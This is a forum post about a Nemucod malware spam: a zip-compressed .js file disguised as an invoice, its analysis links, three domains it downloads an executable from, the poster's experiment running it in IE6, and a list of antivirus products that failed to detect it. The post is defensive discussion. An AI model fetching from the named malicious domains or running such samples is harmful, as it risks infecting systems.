Ant wrote:
> > A unique name given to this malware seems to be "Nemucod"
>
> That's "documen"(t) backwards.
> It won't run with a single click. Malware like this relies on the
> willingness of users to go to any length to see what's inside. If
> they're stupid enough to ignore all sorts of warnings from their
> software or OS about opening attachments or running untrusted scripts
> or executables then they're good candidates for infection.
I got another such spam today, with another zip-compressed .js file:
https://www.virustotal.com/en/file/fa9c9f85ed1fea8b2fe19fcd43df7721fc16a333e42a
9e8b4b5a918f86e5ca91/analysis/1441541590/
http://wepawet.iseclab.org/view.php?hash=1404be252a3d2861fdffc6af412d2495&type=
js
Looks like its trying to download an exe file from one of:
dickinsonwrestlingclub.com
www.fibrasinteticafm.com
laterrazzafiorita.it
I dragged the .js file over to a few of my installed browsers.
Firefox 2.0.0.20, Netscape 9.0.0.6 and Opera 12.02 all did the same
thing - just opened it as a text file and displayed the text of the .js
file.
IE 6 seems to have actually known it was a script file, because it first
threw up a warning if I wanted to open, run or save a potentially
dangerous file. I said sure - run it. It then threw up this error:
--------------
Windows Script Host
Script: (path to js file)\Invoice_whatever.doc.js
Line: 1
Char: 15876
Error: Arguments are of the wrong type, are out of acceptable range, or
are in conflict with one another.
Code: 800A0BB9
Source: ADODB.Stream
---------------
I had to dismiss that error message about 10 times before it went away.
I would have thought that Opera 12, being somewhat "new" or newer, would
have known how to handle or execute a .js file.
Is IE the only browser that opens / executes .js files if you drop the
file onto the browser? Is this unique for IE6, or to other versions of
IE also do this? Do newer versions of Mozilla-based browsers execute
..js files if you drop them on them?
I re-scanned the first .js file (the one I posted about here 4 days ago)
at VT. It is now being detected by 26 out of 57 AV programs. Here are
a few selected AV/AM programs among the 31 programs that ARE NOT
detecting this as malware - even after 4 days after submission to VT:
Hall of Anti-Virus Shame (no demonstrated ability to detect .js threat
files in a timely manner to be of any use to an end user):
- Avast
- ClamAV
- MalwareBytes
- Microsoft
- Symantec
- TrendMicro/TrendMicro-Housecall
The .JS file today is currently being detected by 9 out of 57.
McAffee is labelling it as "BehavesLike.JS.ExploitBlacole" but a few
others are calling it JS/Nemucod.
Some selected programs that ARE detecting the previous .js file but NOT
the current submission:
Programs that will eventually (probably) detect this polymorphic .js
threat technique - but only after you've been exposed to it:
- AVG
- Avira
- ESET-NOD32
- F-Secure
- Kaspersky (!)
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)
|